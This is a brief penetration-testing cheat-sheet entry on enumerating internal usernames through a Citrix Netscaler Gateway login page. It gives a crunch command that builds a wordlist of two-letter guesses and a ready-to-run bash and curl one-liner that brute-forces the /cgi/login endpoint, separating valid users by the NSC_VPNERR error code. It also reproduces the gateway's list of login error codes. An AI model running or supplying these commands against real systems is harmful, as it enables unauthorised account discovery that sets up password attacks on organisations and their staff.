User Enumeration

Citrix Netscaler Gateway

It is possible to enumerate internal users by brute-forcing the username on the Citrix Netscaler Gateway web interface.

Generate worlist of possible users

Use a tool to generate a wordlist of all possible usernames based on the company schema. An easy example I already run into in a real engagement was the first letter of firstname and the first letter of lastname (i.e. sb).

crunch 2 2 abcdefghijklmnopqrstuvwxyz -o users.txt
Enumerate valid users

Once you have a proper wordlist, enumerate valid users with the following bash one-liner:

for u in $(cat <USERLIST>); do curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=$u" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR=4001" >/dev/null && echo "[+] Found valid user: $u"; done | tee <VALID USERS OUTPUT FILE>

Warning

Be careful to not lock users out! In fact, this will try to authenticate using wrong credentials.

Other response status

Get miscellaneous information about any user based on the status response:

curl -s -i -X POST https://<HOSTNAME>/cgi/login -d "login=<USERNAME>" -d "passwd=dummy123" -d "passwd1=dummy123" | grep "NSC_VPNERR"

All response status codes can be found in the following XML file: https://<HOSTNAME>/logon/themes/Default/resources/en.xml

<String id="errorMessageLabel4001">Incorrect user name or password.</String>
<String id="errorMessageLabel4002">You do not have permission to log on.</String>
<String id="errorMessageLabel4003">Cannot connect to server. Try connecting again in a few minutes.</String>
<String id="errorMessageLabel4004">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4005">Cannot connect. Try connecting again. </String>
<String id="errorMessageLabel4006">Incorrect user name.  </String>
<String id="errorMessageLabel4007">Incorrect password.</String>
<String id="errorMessageLabel4008">Passwords do not match.</String>
<String id="errorMessageLabel4009">User not found.</String>
<String id="errorMessageLabel4010">You do not have permission to log on at this time.</String>
<String id="errorMessageLabel4011">Your account is disabled.</String>
<String id="errorMessageLabel4012">Your password has expired.</String>
<String id="errorMessageLabel4013">You do not have permission to log on.</String>
<String id="errorMessageLabel4014">Could not change your password.</String>
<String id="errorMessageLabel4015">Your account is temporarily locked.  </String>
<String id="errorMessageLabel4016">Could not update your password. The password must meet the length, complexity, and history requirements of the domain.</String>
<String id="errorMessageLabel4017">Unable to process your request.</String>
<String id="errorMessageLabel4018">Your device failed to meet compliance requirements. Please check with your administrator.</String>
<String id="errorMessageLabel4019">Your device is not managed. Please check with your administrator.</String>
<String id="errorMessageLabelMax">4019</String>

Warning

Be careful to not lock users out! In fact, this will try to authenticate using wrong credentials.